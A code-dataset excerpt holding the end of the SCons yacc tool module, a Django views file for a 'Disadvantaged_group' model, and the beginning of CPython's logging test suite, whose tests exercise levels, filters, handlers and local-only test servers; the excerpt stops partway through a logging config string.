env['YACCCOM'] = '$YACC $YACCFLAGS -o $TARGET $SOURCES'
env['YACCHFILESUFFIX'] = '.h'
env['YACCHXXFILESUFFIX'] = '.hpp'
env['YACCVCGFILESUFFIX'] = '.vcg'
def exists(env):
return env.Detect(['bison', 'yacc'])
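# Hedged usage sketch (hypothetical SConstruct, not part of this module):
#   env = Environment(tools=['default', 'yacc'])
#   env.Append(YACCFLAGS='-d')   # per yEmitter above, parser.h is also emitted
#   env.CFile(target='parser.c', source='parser.y')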
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
src/engine/SCons/Tool/yacc.py
|
Python
|
mit
| 4,613
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView
from baseapp.models import Disadvantaged_group
from django.contrib import auth, messages
class Disadvantaged_groupView(object):
model = Disadvantaged_group
def get_template_names(self):
"""Nest templates within disadvantaged_group directory."""
tpl = super(Disadvantaged_groupView, self).get_template_names()[0]
app = self.model._meta.app_label
mdl = 'disadvantaged_group'
self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
return [self.template_name]
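    # Hedged illustration (not part of the original module): for app 'baseapp'
    # and a ListView, the default name 'baseapp/disadvantaged_group_list.html'
    # becomes 'baseapp/disadvantaged_group/disadvantaged_group_list.html'.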
class Disadvantaged_groupBaseListView(Disadvantaged_groupView):
paginate_by = 10
class Disadvantaged_groupCreateView(Disadvantaged_groupView, CreateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
messages.add_message(
self.request,
messages.SUCCESS,"Successfully created."
)
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupDeleteView(Disadvantaged_groupView, DeleteView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupDetailView(Disadvantaged_groupView, DetailView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupListView(Disadvantaged_groupBaseListView, ListView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupUpdateView(Disadvantaged_groupView, UpdateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
|
tnemis/staging-server
|
baseapp/views/disadvantaged_group_views.py
|
Python
|
mit
| 1,981
|
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import select
import socket
import struct
import sys
import tempfile
from test.support import (captured_stdout, run_with_locale, run_unittest,
patch, requires_zlib, TestHandler, Matcher)
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asynchat
import asyncore
import errno
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except socket.error: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
old_stderr = sys.stderr
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertIn('\nRuntimeError: deliberate mistake\n',
sio.getvalue())
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertEqual('', sio.getvalue())
finally:
logging.raiseExceptions = old_raise
sys.stderr = old_stderr
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPChannel(smtpd.SMTPChannel):
"""
This derived class has had to be created because smtpd does not
support use of custom channel maps, although they are allowed by
asyncore's design. Issue #11959 has been raised to address this,
and if resolved satisfactorily, some of this code can be removed.
"""
def __init__(self, server, conn, addr, sockmap):
asynchat.async_chat.__init__(self, conn, sockmap)
self.smtp_server = server
self.conn = conn
self.addr = addr
self.data_size_limit = None
self.received_lines = []
self.smtp_state = self.COMMAND
self.seen_greeting = ''
self.mailfrom = None
self.rcpttos = []
self.received_data = ''
self.fqdn = socket.getfqdn()
self.num_bytes = 0
try:
self.peer = conn.getpeername()
except socket.error as err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err.args[0] != errno.ENOTCONN:
raise
return
self.push('220 %s %s' % (self.fqdn, smtpd.__version__))
self.set_terminator(b'\r\n')
self.extended_smtp = False
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
channel_class = TestSMTPChannel
def __init__(self, addr, handler, poll_interval, sockmap):
self._localaddr = addr
self._remoteaddr = None
self.data_size_limit = None
self.sockmap = sockmap
asyncore.dispatcher.__init__(self, map=sockmap)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
self.set_socket(sock, map=sockmap)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(addr)
self.port = sock.getsockname()[1]
self.listen(5)
except:
self.close()
raise
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def handle_accepted(self, conn, addr):
"""
Redefined only because the base class does not pass in a
map, forcing use of a global in :mod:`asyncore`.
"""
channel = self.channel_class(self, conn, addr, self.sockmap)
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self.sockmap)
except select.error:
# On FreeBSD 8, closing the server repeatedly
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except socket.error as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except socket.error:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
def test_basic(self):
sockmap = {}
server = TestSMTPServer(('localhost', 0), self.process_message, 0.001,
sockmap)
server.start()
addr = ('localhost', server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log', timeout=5.0)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(5.0) # Issue #14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
